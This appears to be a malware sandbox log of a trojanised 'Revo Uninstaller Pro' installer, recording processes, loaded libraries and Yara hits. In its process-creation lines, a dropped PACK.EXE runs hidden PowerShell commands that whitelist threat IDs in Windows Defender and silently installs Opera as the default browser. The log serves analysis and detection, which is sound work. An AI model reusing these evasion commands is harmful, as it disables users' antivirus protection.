        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00300548
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EF5C5
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F364E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00310654
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F66A2
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E2692
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F589E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FF8C6
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F397F
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EE973
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EDADD
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EBAD1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00303CBA
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FFCDE
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F6CDB
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E5D7E
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E3EAD
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00303EE9
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EDF12
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0451B578
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0451B569
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04ABB578
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04ABB569
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_085E3AA8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_048AB578
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_048AB569
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 25_2_083A3AA8
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 27_2_00406DC0
        Source: Joe Sandbox View | Dropped File: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: String function: 002FD870 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: String function: 002FD940 appears 51 times
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: String function: 002FE2F0 appears 31 times
        Source: setup.exe.28.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
        Source: setup.exe.29.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
        Source: ruplp.exe.0.dr | Static PE information: Number of sections : 11 > 10
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameinetc.dllF vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRevoAppBar.exeJ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRUExt.dll^ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRevoUnPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerevoflt.sysJ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRUExt.dll^ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRevoUninPro.exeD vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRevoUPPort.exe@ vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Revo.Uninstaller.Pro.v5.3.4.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engine | Classification label: mal44.troj.evad.winEXE@44/128@9/8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E6D06 GetLastError,FormatMessageW
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 27_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_004021CF CoCreateInstance
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\Desktop\Revo Uninstaller Pro.lnk
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\RevoUninstallerPro}
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Opera/Installer/C:/Users/user/AppData/Local/Programs/Opera
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\nso8F38.tmp
        Source: Yara match | File source: 9.0.ruplp.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000009.00000000.1735791667.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: ps216_2_002FCBB8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: sfxname16_2_002FCBB8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: sfxstime16_2_002FCBB8
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: STARTDLG16_2_002FCBB8
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeJump to behavior
        Source: unknown | Process created: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
        Source: C:\Windows\System32\runonce.exe | Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
        Source: unknown | Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Process created: C:\Users\user\Downloads\OperaSetup.exe "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
        Source: C:\Users\user\Downloads\OperaSetup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=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
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYyMzk4LjE0MjgiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiNWU5Y2QwZDQtYTQ2My00MzE3LTk1ODQtNTZkMjA3ZjRlYTc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: windows.fileexplorer.common.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: linkinfo.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ntshrui.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: cscapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: sppc.dll
